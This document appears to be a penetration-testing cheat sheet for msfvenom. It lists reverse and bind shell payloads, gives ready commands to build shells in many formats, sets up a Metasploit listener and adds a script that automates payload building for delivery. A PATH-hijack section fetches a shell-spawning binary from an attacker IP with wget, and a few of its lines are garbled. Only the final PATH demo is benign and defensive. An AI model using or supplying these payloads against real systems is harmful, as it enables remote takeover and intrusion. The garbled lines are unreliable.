msfvenom

Show all payloads

msfvenom -l payloads

Show all payload formats

msfvenom -l formats

Generate a payload

msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output payload file name>

Common payloads

meterpreter (all staged: note the / before the stage name)

linux/x86/meterpreter/reverse_tcp

linux x86 meterpreter reverse shell

linux/x64/meterpreter/reverse_tcp

linux x64 meterpreter reverse shell

windows/meterpreter/reverse_tcp

windows x86 meterpreter reverse shell

windows/x64/meterpreter/reverse_tcp

windows x64 meterpreter reverse shell

Staged (a / separates stager and stage, e.g. shell/reverse_tcp; the stage is sent by the listener, so these need a Metasploit handler, not a plain nc listener)

linux/x86/shell/bind_tcp

linux x86 bind shell

linux/x86/shell/reverse_tcp

linux x86 reverse shell

windows/shell/bind_tcp

windows x86 bind shell

windows/shell/reverse_tcp

windows x86 reverse shell

Nonstaged / stageless (an _ in the name, e.g. shell_reverse_tcp; the whole payload is in the binary, so a plain nc listener works)

linux/x86/shell_bind_tcp

linux x86 bind shell

linux/x86/shell_reverse_tcp

linux x86 reverse shell

windows/shell_bind_tcp

windows x86 bind shell

windows/shell_reverse_tcp

windows x86 reverse shell

MSFVENOM PAYLOAD

Linux

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Windows

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

PHP

msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

The raw output needs an opening <?php tag on the first line so the server executes it as PHP (check with head -c 20 shell.php first: recent Metasploit versions already emit a leading /*<?php /**/). The one-liner below uses the macOS clipboard tools pbcopy/pbpaste; on Linux prepend the tag with any editor or sed instead.
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl

Listener

Metasploit

use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z
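The generation commands and the handler above are tied together by one rule: the handler's PAYLOAD must be the exact -p value given to msfvenom (a staged shell/reverse_tcp and the nonstaged shell_reverse_tcp are not interchangeable). The following POSIX shell helpers, added here as an example and not part of the original notes or of Metasploit itself, pick the -f format per payload family as this page does, fix up the PHP opening tag portably (covering the pbcopy/pbpaste step in the PHP section), and write a matching resource file for msfconsole -r. The function names payload_format, ensure_php_tag, gen_handler_rc and build_payload are made up for this example; build_payload is the only one that actually needs msfvenom installed.

```shell
#!/bin/sh
# Added example: glue around the msfvenom + multi/handler workflow.
# Helper names are invented for this example.

# Map a payload name to "<msfvenom -f format> <file extension>", following the
# format choices used on this page.
payload_format() {
    case "$1" in
        linux/*)                 echo "elf elf" ;;
        windows/*)               echo "exe exe" ;;
        php/*)                   echo "raw php" ;;
        java/jsp_*)              echo "raw jsp" ;;
        cmd/unix/reverse_python) echo "raw py" ;;
        cmd/unix/reverse_bash)   echo "raw sh" ;;
        cmd/unix/reverse_perl)   echo "raw pl" ;;
        *)                       echo "raw bin" ;;
    esac
}

# Raw PHP output starts with an opening tag in some Metasploit versions and not in
# others; prepend "<?php " only when it is missing. Portable replacement for the
# macOS-only pbcopy/pbpaste one-liner.
ensure_php_tag() {
    f=$1
    if ! head -c 64 "$f" | grep -qF '<?php'; then
        printf '<?php ' | cat - "$f" > "$f.tmp" && mv "$f.tmp" "$f"
    fi
}

# Resource file for "msfconsole -q -r <file>" with PAYLOAD set to the exact
# value used for msfvenom -p, so staged/nonstaged never get mixed up.
gen_handler_rc() {
    printf 'use exploit/multi/handler\nset PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j -z\n' \
        "$1" "$2" "$3"
}

# build_payload <payload> <lhost> <lport> <basename>: runs msfvenom (must be installed),
# writes <basename>.<ext> and a matching <basename>.rc for the listener.
build_payload() {
    p=$1; lhost=$2; lport=$3; base=$4
    set -- $(payload_format "$p")
    fmt=$1; ext=$2
    out="$base.$ext"
    msfvenom -p "$p" LHOST="$lhost" LPORT="$lport" -f "$fmt" -o "$out" || return 1
    [ "$ext" = php ] && ensure_php_tag "$out"
    gen_handler_rc "$p" "$lhost" "$lport" > "$base.rc"
    echo "built $out; start the listener with: msfconsole -q -r $base.rc"
}
```

Usage: `build_payload windows/x64/meterpreter/reverse_tcp 10.0.0.5 4444 shell` produces shell.exe and shell.rc; run `msfconsole -q -r shell.rc` before delivering the binary.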

PATH hijack: build a fake scp that simply executes /bin/sh, for a target program that invokes scp by name rather than by absolute path.

msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp

wget 192.168.1.23/scp -O /tmp/s** # transfer the exec binary (served over HTTP from the attacker box) to the target, Sufferance
chmod 755 /tmp/scp

export PATH=/tmp:$PATH # prepend /tmp so that any program resolving "scp" through PATH finds ours first

/usr/local/bin/ # run the target program from here: since it calls scp by name, it now executes our "special" scp in /tmp instead of the real one
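The hijack works only because the victim program resolves scp through PATH; a program that calls scp by absolute path is unaffected. The POSIX shell demo below, added here as an example and not part of the original notes, reproduces that in a scratch directory without msfvenom: a fake scp (standing in for the linux/x86/exec binary, it prints a marker instead of spawning /bin/sh), a stand-in for the real scp, and two victim scripts, one calling scp by bare name and one by absolute path. The directory layout and the function names setup_demo and run_victim are made up for the example.

```shell
#!/bin/sh
# Added example: PATH hijacking demo. All paths and names are constructed for the demo.

# Creates a scratch tree:  bin/scp (stand-in for the real scp), tmp/scp (attacker's
# fake scp, i.e. the /tmp/scp of the notes) and two victim programs. Prints the dir.
setup_demo() {
    DEMO=$(mktemp -d)
    mkdir -p "$DEMO/tmp" "$DEMO/bin" "$DEMO/victim"

    # stand-in for the legitimate scp
    cat > "$DEMO/bin/scp" <<'EOF'
#!/bin/sh
echo "REAL"
EOF
    # attacker's fake scp dropped into a world-writable dir (would be /bin/sh in the real attack)
    cat > "$DEMO/tmp/scp" <<'EOF'
#!/bin/sh
echo "HIJACKED"
EOF
    # vulnerable victim: resolves scp through PATH
    cat > "$DEMO/victim/backup_relative" <<'EOF'
#!/bin/sh
scp
EOF
    # hardened victim: absolute path, PATH is irrelevant
    cat > "$DEMO/victim/backup_absolute" <<EOF
#!/bin/sh
$DEMO/bin/scp
EOF
    chmod 755 "$DEMO/bin/scp" "$DEMO/tmp/scp" \
              "$DEMO/victim/backup_relative" "$DEMO/victim/backup_absolute"
    echo "$DEMO"
}

# run_victim <demo dir> <backup_relative|backup_absolute> <yes|no>
# Runs the victim with PATH either prepended with the attacker dir (yes), which is
# the "export PATH=/tmp:$PATH" step of the notes, or left clean (no).
# Prints whichever scp actually ran: HIJACKED or REAL.
run_victim() {
    demo=$1; victim=$2; hijack=$3
    path="$demo/bin"
    [ "$hijack" = yes ] && path="$demo/tmp:$path"
    PATH="$path:/usr/bin:/bin" "$demo/victim/$victim"
}

# Run with "sh thisfile.sh run" to see all four combinations.
if [ "${1:-}" = run ]; then
    D=$(setup_demo)
    for v in backup_relative backup_absolute; do
        for h in no yes; do
            echo "$v hijack=$h -> $(run_victim "$D" "$v" "$h")"
        done
    done
    rm -rf "$D"
fi
```

The defensive takeaway is in the second victim: privileged programs and SUID helpers should invoke external tools by absolute path (or reset PATH themselves) so that a writable directory earlier in PATH cannot substitute the binary.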
